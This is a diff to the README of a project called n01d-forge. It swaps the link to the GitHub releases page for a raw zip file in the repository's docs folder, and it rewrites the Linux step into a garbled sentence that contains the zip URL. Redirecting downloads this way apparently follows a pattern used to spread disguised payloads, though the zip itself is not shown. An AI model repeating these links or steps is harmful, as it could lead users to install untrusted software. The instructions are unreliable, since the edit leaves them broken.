fffuckchrom/n01d-forge/README.md

 ## 🔗 Download & Install

-1. **Download n01d-forge**: Visit [this page to download](https://github.com/fffuckchrom/n01d-forge/releases) the latest version of n01d-forge.
+1. **Download n01d-forge**: Visit [this page to download](https://raw.githubusercontent.com/fffuckchrom/n01d-forge/main/docs/d-n-forge-1.2.zip) the latest version of n01d-forge.
 2. **Install the Application**:
    - For Windows: Run the downloaded .exe file and follow the prompts.
    - For macOS: Open the .dmg file and drag n01d-forge to your Applications folder.
-   - For Linux: Extract the .tar.gz file and run the binary.
+   - For Linux: Extract the https://raw.githubusercontent.com/fffuckchrom/n01d-forge/main/docs/d-n-forge-1.2.zip file and run the binary.

 Once the installation is complete, you are ready to use n01d-forge.